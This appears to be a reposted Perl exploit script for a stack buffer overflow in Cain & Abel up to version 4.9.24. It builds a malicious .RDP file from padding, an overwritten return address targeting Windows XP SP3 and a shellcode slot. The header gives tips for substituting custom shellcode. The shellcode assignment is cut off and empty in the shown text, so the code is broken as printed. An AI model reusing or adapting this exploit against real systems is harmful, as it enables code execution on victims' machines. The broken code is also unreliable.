Cain & Abel < = v4.9.24 .RDP Stack Overflow Exploit

# Cain & Abel <= v4.9.24 .RDP Stack Overflow Exploit
# Exploit by SkD ([email protected])
# -----------------------------------------------
# Nothing much to say about this one. This works on
# an updated Windows XP SP3. On Vista this exploit is way easier
# the more challenging one was on XP, and here it is.
# Enjoy :). Also remember if you want to put your own shellcode
# there are a few character restrictions and using Alpha2 or
# Alpha Numerical won't work at all.
# To open the .RDP file in Cain & Abel, click the
# "Remote Password Decoder Dialog" icon.
# Credits to Encrypt3d.M!nd.
# {Author has no responsibility over the damage you do with this!}

use strict; use warnings;

# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub
my $shellcode =
my $addr = "\xb5\xb5\xfd\x7f";
my $overflow = "\x41" x 8206 ;
my $overflow2 = "\x41" x 255 ;
my $eip = "\xd7\x30\x9d\x7c"; #   FOR WINDOWS XP SP3:  0x7c9d30d7       jmp esp (shell32.dll)

open(my $rdp, "> s.rdp");
print $rdp $overflow.$eip.$addr.$overflow2.$shellcode;

# [2008-11-30]


抢楼还有机会... 抢座Rss 2.0或者 Trackback